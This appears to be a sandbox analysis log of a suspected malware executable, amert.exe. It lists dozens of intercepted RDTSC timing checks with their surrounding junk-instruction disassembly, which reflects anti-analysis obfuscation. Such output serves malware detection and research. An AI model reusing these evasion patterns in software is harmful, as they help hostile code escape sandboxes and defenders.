Source: C:\Users\user\AppData\Local\Temp\1000019001\amert.exe RDTSC instruction interceptor: First address: 89A44F second address: 89A46F instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007F0D75558569h 0x00000008 pushad 0x00000009 popad 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\AppData\Local\Temp\1000019001\amert.exe RDTSC instruction interceptor: First address: 89A7A5 second address: 89A7D1 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F0D755569DBh 0x00000007 push eax 0x00000008 push edi 0x00000009 pop edi 0x0000000a pop eax 0x0000000b pop edx 0x0000000c pop eax 0x0000000d pushad 0x0000000e jmp 00007F0D755569E5h 0x00000013 push eax 0x00000014 push eax 0x00000015 push edx 0x00000016 rdtsc
Source: C:\Users\user\AppData\Local\Temp\1000019001\amert.exe RDTSC instruction interceptor: First address: 89AB77 second address: 89AB7F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 push edi 0x00000007 pop edi 0x00000008 rdtsc
Source: C:\Users\user\AppData\Local\Temp\1000019001\amert.exe RDTSC instruction interceptor: First address: 89AB7F second address: 89AB93 instructions: 0x00000000 rdtsc 0x00000002 jc 00007F0D755569D6h 0x00000008 je 00007F0D755569D6h 0x0000000e pop edx 0x0000000f pop eax 0x00000010 push eax 0x00000011 push edx 0x00000012 pushad 0x00000013 popad 0x00000014 rdtsc
Source: C:\Users\user\AppData\Local\Temp\1000019001\amert.exe RDTSC instruction interceptor: First address: 89AB93 second address: 89AB97 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\1000019001\amert.exe RDTSC instruction interceptor: First address: 89AB97 second address: 89ABB1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jnc 00007F0D755569D6h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c pop edx 0x0000000d pop eax 0x0000000e push eax 0x0000000f push edx 0x00000010 je 00007F0D755569DAh 0x00000016 pushad 0x00000017 popad 0x00000018 pushad 0x00000019 popad 0x0000001a rdtsc
Source: C:\Users\user\AppData\Local\Temp\1000019001\amert.exe RDTSC instruction interceptor: First address: 89ABB1 second address: 89ABB7 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push esi 0x00000005 pop esi 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\1000019001\amert.exe RDTSC instruction interceptor: First address: 89B2B4 second address: 89B2BB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
Source: C:\Users\user\AppData\Local\Temp\1000019001\amert.exe RDTSC instruction interceptor: First address: 89B2BB second address: 89B2D9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edx 0x00000005 pop edx 0x00000006 ja 00007F0D75558556h 0x0000000c popad 0x0000000d pop eax 0x0000000e push ecx 0x0000000f push eax 0x00000010 push edx 0x00000011 jmp 00007F0D7555855Bh 0x00000016 push eax 0x00000017 push edx 0x00000018 rdtsc
Source: C:\Users\user\AppData\Local\Temp\1000019001\amert.exe RDTSC instruction interceptor: First address: 89B2D9 second address: 89B2DD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\1000019001\amert.exe RDTSC instruction interceptor: First address: 89987E second address: 899894 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 jmp 00007F0D7555855Dh 0x0000000a push eax 0x0000000b push edx 0x0000000c pushad 0x0000000d popad 0x0000000e rdtsc
Source: C:\Users\user\AppData\Local\Temp\1000019001\amert.exe RDTSC instruction interceptor: First address: 899894 second address: 8998CE instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F0D755569E6h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 popad 0x0000000a push eax 0x0000000b push edx 0x0000000c jmp 00007F0D755569E9h 0x00000011 push eax 0x00000012 push edx 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
Source: C:\Users\user\AppData\Local\Temp\1000019001\amert.exe RDTSC instruction interceptor: First address: 8998CE second address: 8998D2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\1000019001\amert.exe RDTSC instruction interceptor: First address: 8998D2 second address: 8998DA instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 rdtsc
Source: C:\Users\user\AppData\Local\Temp\1000019001\amert.exe RDTSC instruction interceptor: First address: 8998DA second address: 8998E2 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 pushad 0x00000007 popad 0x00000008 rdtsc
Source: C:\Users\user\AppData\Local\Temp\1000019001\amert.exe RDTSC instruction interceptor: First address: 8998E2 second address: 8998E6 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\1000019001\amert.exe RDTSC instruction interceptor: First address: 8998E6 second address: 8998F2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push edx 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\AppData\Local\Temp\1000019001\amert.exe RDTSC instruction interceptor: First address: 8998F2 second address: 899906 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F0D755569E0h 0x00000009 rdtsc
Source: C:\Users\user\AppData\Local\Temp\1000019001\amert.exe RDTSC instruction interceptor: First address: 899906 second address: 89990A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\1000019001\amert.exe RDTSC instruction interceptor: First address: 8A31CF second address: 8A31F9 instructions: 0x00000000 rdtsc 0x00000002 jne 00007F0D755569D6h 0x00000008 jmp 00007F0D755569E6h 0x0000000d pop edx 0x0000000e pop eax 0x0000000f pushad 0x00000010 pushad 0x00000011 jns 00007F0D755569D6h 0x00000017 push eax 0x00000018 push edx 0x00000019 rdtsc
Source: C:\Users\user\AppData\Local\Temp\1000019001\amert.exe RDTSC instruction interceptor: First address: 8B0344 second address: 8B0352 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push esi 0x00000005 pop esi 0x00000006 push eax 0x00000007 push edx 0x00000008 jp 00007F0D75558556h 0x0000000e rdtsc
Source: C:\Users\user\AppData\Local\Temp\1000019001\amert.exe RDTSC instruction interceptor: First address: 8B3B05 second address: 8B3B09 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\1000019001\amert.exe RDTSC instruction interceptor: First address: 8B3B09 second address: 8B3B0D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\1000019001\amert.exe RDTSC instruction interceptor: First address: 8B34B0 second address: 8B34B5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\AppData\Local\Temp\1000019001\amert.exe RDTSC instruction interceptor: First address: 8B364D second address: 8B3654 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 rdtsc
Source: C:\Users\user\AppData\Local\Temp\1000019001\amert.exe RDTSC instruction interceptor: First address: 8B3654 second address: 8B3667 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F0D755569DFh 0x00000009 rdtsc
Source: C:\Users\user\AppData\Local\Temp\1000019001\amert.exe RDTSC instruction interceptor: First address: 8B3667 second address: 8B366B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\1000019001\amert.exe RDTSC instruction interceptor: First address: 8B366B second address: 8B3674 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\AppData\Local\Temp\1000019001\amert.exe RDTSC instruction interceptor: First address: 8B5B53 second address: 8B5B59 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\1000019001\amert.exe RDTSC instruction interceptor: First address: 8B5843 second address: 8B5847 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\1000019001\amert.exe RDTSC instruction interceptor: First address: 8B5847 second address: 8B584D instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\1000019001\amert.exe RDTSC instruction interceptor: First address: 8CCFB1 second address: 8CCFB5 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\1000019001\amert.exe RDTSC instruction interceptor: First address: 8CCFB5 second address: 8CCFD5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jnp 00007F0D7555856Ah 0x0000000c jns 00007F0D75558556h 0x00000012 jmp 00007F0D7555855Eh 0x00000017 rdtsc
Source: C:\Users\user\AppData\Local\Temp\1000019001\amert.exe RDTSC instruction interceptor: First address: 8CD119 second address: 8CD11F instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\1000019001\amert.exe RDTSC instruction interceptor: First address: 8CD268 second address: 8CD26E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\1000019001\amert.exe RDTSC instruction interceptor: First address: 8CD26E second address: 8CD272 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\1000019001\amert.exe RDTSC instruction interceptor: First address: 8CD272 second address: 8CD27E instructions: 0x00000000 rdtsc 0x00000002 jbe 00007F0D75558556h 0x00000008 pushad 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c rdtsc
Source: C:\Users\user\AppData\Local\Temp\1000019001\amert.exe RDTSC instruction interceptor: First address: 8CD27E second address: 8CD289 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jnp 00007F0D755569D6h 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\AppData\Local\Temp\1000019001\amert.exe RDTSC instruction interceptor: First address: 8CD64C second address: 8CD651 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\AppData\Local\Temp\1000019001\amert.exe RDTSC instruction interceptor: First address: 8CD651 second address: 8CD657 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\1000019001\amert.exe RDTSC instruction interceptor: First address: 8CD657 second address: 8CD682 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 jmp 00007F0D7555855Ah 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d push edx 0x0000000e jmp 00007F0D75558565h 0x00000013 push edx 0x00000014 push eax 0x00000015 push edx 0x00000016 rdtsc
Source: C:\Users\user\AppData\Local\Temp\1000019001\amert.exe RDTSC instruction interceptor: First address: 8CD682 second address: 8CD68D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jne 00007F0D755569D6h 0x0000000a pop edx 0x0000000b rdtsc
Source: C:\Users\user\AppData\Local\Temp\1000019001\amert.exe RDTSC instruction interceptor: First address: 8CD95E second address: 8CD962 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\1000019001\amert.exe RDTSC instruction interceptor: First address: 8D13AA second address: 8D13B1 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
Source: C:\Users\user\AppData\Local\Temp\1000019001\amert.exe RDTSC instruction interceptor: First address: 8E4086 second address: 8E40C0 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 jnp 00007F0D75558556h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c pop ebx 0x0000000d push eax 0x0000000e push edx 0x0000000f pushad 0x00000010 jl 00007F0D75558556h 0x00000016 jp 00007F0D75558556h 0x0000001c push eax 0x0000001d pop eax 0x0000001e popad 0x0000001f pushad 0x00000020 jc 00007F0D75558556h 0x00000026 push edx 0x00000027 pop edx 0x00000028 jmp 00007F0D75558561h 0x0000002d popad 0x0000002e rdtsc
Source: C:\Users\user\AppData\Local\Temp\1000019001\amert.exe RDTSC instruction interceptor: First address: 8E40C0 second address: 8E40DD instructions: 0x00000000 rdtsc 0x00000002 jnp 00007F0D755569E8h 0x00000008 pushad 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\AppData\Local\Temp\1000019001\amert.exe RDTSC instruction interceptor: First address: 8E3E76 second address: 8E3E9A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edi 0x00000005 pop edi 0x00000006 pop esi 0x00000007 push eax 0x00000008 push edx 0x00000009 jmp 00007F0D75558569h 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
Source: C:\Users\user\AppData\Local\Temp\1000019001\amert.exe RDTSC instruction interceptor: First address: 8E3E9A second address: 8E3E9E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\1000019001\amert.exe RDTSC instruction interceptor: First address: 8E3E9E second address: 8E3EC7 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 jmp 00007F0D75558569h 0x0000000d popad 0x0000000e pushad 0x0000000f push eax 0x00000010 push edx 0x00000011 push edx 0x00000012 pop edx 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
Source: C:\Users\user\AppData\Local\Temp\1000019001\amert.exe RDTSC instruction interceptor: First address: 8E3EC7 second address: 8E3ECB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\1000019001\amert.exe RDTSC instruction interceptor: First address: 8E3ECB second address: 8E3ECF instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\1000019001\amert.exe RDTSC instruction interceptor: First address: 8E1412 second address: 8E1421 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 jng 00007F0D755569D6h 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\AppData\Local\Temp\1000019001\amert.exe RDTSC instruction interceptor: First address: 8F1350 second address: 8F1354 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\1000019001\amert.exe RDTSC instruction interceptor: First address: 8F1354 second address: 8F135A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\1000019001\amert.exe RDTSC instruction interceptor: First address: 8F135A second address: 8F137D instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F0D7555855Fh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pushad 0x0000000a pushad 0x0000000b jnp 00007F0D75558556h 0x00000011 js 00007F0D75558556h 0x00000017 push eax 0x00000018 push edx 0x00000019 rdtsc
Source: C:\Users\user\AppData\Local\Temp\1000019001\amert.exe RDTSC instruction interceptor: First address: 8F137D second address: 8F1387 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push ebx 0x00000006 pushad 0x00000007 popad 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\AppData\Local\Temp\1000019001\amert.exe RDTSC instruction interceptor: First address: 8F0EAC second address: 8F0EC8 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007F0D75558567h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\AppData\Local\Temp\1000019001\amert.exe RDTSC instruction interceptor: First address: 8F0EC8 second address: 8F0ECE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\1000019001\amert.exe RDTSC instruction interceptor: First address: 8F0ECE second address: 8F0F00 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 jne 00007F0D75558558h 0x0000000d pop edx 0x0000000e pop eax 0x0000000f push eax 0x00000010 ja 00007F0D7555856Ch 0x00000016 push eax 0x00000017 push edx 0x00000018 push eax 0x00000019 push edx 0x0000001a rdtsc
Source: C:\Users\user\AppData\Local\Temp\1000019001\amert.exe RDTSC instruction interceptor: First address: 8F0F00 second address: 8F0F04 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\1000019001\amert.exe RDTSC instruction interceptor: First address: 8F1084 second address: 8F108C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push esi 0x00000005 pop esi 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\AppData\Local\Temp\1000019001\amert.exe RDTSC instruction interceptor: First address: 90B9E5 second address: 90BA0E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 popad 0x00000007 pop esi 0x00000008 push eax 0x00000009 push edx 0x0000000a jg 00007F0D755569EFh 0x00000010 rdtsc
Source: C:\Users\user\AppData\Local\Temp\1000019001\amert.exe RDTSC instruction interceptor: First address: 90BA0E second address: 90BA18 instructions: 0x00000000 rdtsc 0x00000002 js 00007F0D7555855Eh 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\AppData\Local\Temp\1000019001\amert.exe RDTSC instruction interceptor: First address: 90BB68 second address: 90BB6E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\1000019001\amert.exe RDTSC instruction interceptor: First address: 90BB6E second address: 90BB74 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\1000019001\amert.exe RDTSC instruction interceptor: First address: 90BE47 second address: 90BE4B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\1000019001\amert.exe RDTSC instruction interceptor: First address: 90C28F second address: 90C2E6 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F0D75558564h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 jmp 00007F0D75558566h 0x0000000e jbe 00007F0D7555855Ch 0x00000014 push eax 0x00000015 push edx 0x00000016 jmp 00007F0D75558569h 0x0000001b pushad 0x0000001c popad 0x0000001d rdtsc
Source: C:\Users\user\AppData\Local\Temp\1000019001\amert.exe RDTSC instruction interceptor: First address: 90C494 second address: 90C498 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\1000019001\amert.exe RDTSC instruction interceptor: First address: 910C76 second address: 910C8D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F0D75558563h 0x00000009 rdtsc
Source: C:\Users\user\AppData\Local\Temp\1000019001\amert.exe RDTSC instruction interceptor: First address: 910F96 second address: 91102B instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F0D755569E7h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 popad 0x0000000a mov dword ptr [esp], eax 0x0000000d jmp 00007F0D755569E2h 0x00000012 push dword ptr [ebp+122D29ACh] 0x00000018 xor dword ptr [ebp+122D29A6h], edx 0x0000001e call 00007F0D755569D9h 0x00000023 jnc 00007F0D755569E5h 0x00000029 push eax 0x0000002a jng 00007F0D755569E9h 0x00000030 jmp 00007F0D755569E3h 0x00000035 mov eax, dword ptr [esp+04h] 0x00000039 jnc 00007F0D755569E2h 0x0000003f mov eax, dword ptr [eax] 0x00000041 push eax 0x00000042 push edx 0x00000043 pushad 0x00000044 push edx 0x00000045 pop edx 0x00000046 push eax 0x00000047 pop eax 0x00000048 popad 0x00000049 rdtsc
Source: C:\Users\user\AppData\Local\Temp\1000019001\amert.exe RDTSC instruction interceptor: First address: 91102B second address: 911040 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 jnp 00007F0D75558556h 0x00000009 pop esi 0x0000000a pop edx 0x0000000b pop eax 0x0000000c mov dword ptr [esp+04h], eax 0x00000010 push edx 0x00000011 push eax 0x00000012 push edx 0x00000013 pushad 0x00000014 popad 0x00000015 rdtsc
Source: C:\Users\user\AppData\Local\Temp\1000019001\amert.exe RDTSC instruction interceptor: First address: 913E43 second address: 913E53 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push edx 0x00000007 pushad 0x00000008 popad 0x00000009 jng 00007F0D755569D6h 0x0000000f pop edx 0x00000010 rdtsc
Source: C:\Users\user\AppData\Local\Temp\1000019001\amert.exe RDTSC instruction interceptor: First address: 913E53 second address: 913E73 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007F0D7555855Ch 0x00000008 pushad 0x00000009 popad 0x0000000a push esi 0x0000000b pop esi 0x0000000c pushad 0x0000000d popad 0x0000000e popad 0x0000000f push eax 0x00000010 push edx 0x00000011 pushad 0x00000012 popad 0x00000013 je 00007F0D75558556h 0x00000019 rdtsc
Source: C:\Users\user\AppData\Local\Temp\1000019001\amert.exe RDTSC instruction interceptor: First address: 913E73 second address: 913E77 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\1000019001\amert.exe RDTSC instruction interceptor: First address: 9139BD second address: 9139C8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edi 0x00000005 push eax 0x00000006 push edx 0x00000007 pushad 0x00000008 popad 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\AppData\Local\Temp\1000019001\amert.exe RDTSC instruction interceptor: First address: 9139C8 second address: 9139CC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\1000019001\amert.exe RDTSC instruction interceptor: First address: 4FD0021 second address: 4FD0026 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\AppData\Local\Temp\1000019001\amert.exe RDTSC instruction interceptor: First address: 4FD0026 second address: 4FD002C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\1000019001\amert.exe RDTSC instruction interceptor: First address: 4FD002C second address: 4FD0030 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\1000019001\amert.exe RDTSC instruction interceptor: First address: 4FD0030 second address: 4FD0054 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F0D755569DEh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c pushad 0x0000000d movsx ebx, cx 0x00000010 mov ch, 59h 0x00000012 popad 0x00000013 xchg eax, ebp 0x00000014 push eax 0x00000015 push edx 0x00000016 pushad 0x00000017 pushad 0x00000018 popad 0x00000019 push eax 0x0000001a push edx 0x0000001b rdtsc
Source: C:\Users\user\AppData\Local\Temp\1000019001\amert.exe RDTSC instruction interceptor: First address: 4FD0054 second address: 4FD0059 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\AppData\Local\Temp\1000019001\amert.exe RDTSC instruction interceptor: First address: 4FD0059 second address: 4FD0089 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F0D755569E3h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov ebp, esp 0x0000000b push eax 0x0000000c push edx 0x0000000d jmp 00007F0D755569E5h 0x00000012 rdtsc
Source: C:\Users\user\AppData\Local\Temp\1000019001\amert.exe RDTSC instruction interceptor: First address: 4FB0DA1 second address: 4FB0DB6 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F0D75558561h 0x00000009 rdtsc
Source: C:\Users\user\AppData\Local\Temp\1000019001\amert.exe RDTSC instruction interceptor: First address: 4FB0DB6 second address: 4FB0DDD instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F0D755569E1h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b xchg eax, ebp 0x0000000c push eax 0x0000000d push edx 0x0000000e jmp 00007F0D755569DDh 0x00000013 rdtsc
Source: C:\Users\user\AppData\Local\Temp\1000019001\amert.exe RDTSC instruction interceptor: First address: 4FB0DDD second address: 4FB0E6D instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushfd 0x00000004 jmp 00007F0D75558567h 0x00000009 sub si, 7DAEh 0x0000000e jmp 00007F0D75558569h 0x00000013 popfd 0x00000014 popad 0x00000015 pop edx 0x00000016 pop eax 0x00000017 push eax 0x00000018 pushad 0x00000019 push esi 0x0000001a pushad 0x0000001b popad 0x0000001c pop edx 0x0000001d call 00007F0D75558564h 0x00000022 pushfd 0x00000023 jmp 00007F0D75558562h 0x00000028 and al, FFFFFF88h 0x0000002b jmp 00007F0D7555855Bh 0x00000030 popfd 0x00000031 pop ecx 0x00000032 popad 0x00000033 xchg eax, ebp 0x00000034 push eax 0x00000035 push edx 0x00000036 jmp 00007F0D75558562h 0x0000003b rdtsc
Source: C:\Users\user\AppData\Local\Temp\1000019001\amert.exe RDTSC instruction interceptor: First address: 4FB0E6D second address: 4FB0E9A instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushfd 0x00000004 jmp 00007F0D755569DCh 0x00000009 xor eax, 06CD4718h 0x0000000f jmp 00007F0D755569DBh 0x00000014 popfd 0x00000015 popad 0x00000016 pop edx 0x00000017 pop eax 0x00000018 mov ebp, esp 0x0000001a push eax 0x0000001b push edx 0x0000001c push eax 0x0000001d push edx 0x0000001e pushad 0x0000001f popad 0x00000020 rdtsc
Source: C:\Users\user\AppData\Local\Temp\1000019001\amert.exe RDTSC instruction interceptor: First address: 4FB0E9A second address: 4FB0E9E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\1000019001\amert.exe RDTSC instruction interceptor: First address: 4FB0E9E second address: 4FB0EA4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\1000019001\amert.exe RDTSC instruction interceptor: First address: 4FB0EA4 second address: 4FB0EA9 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
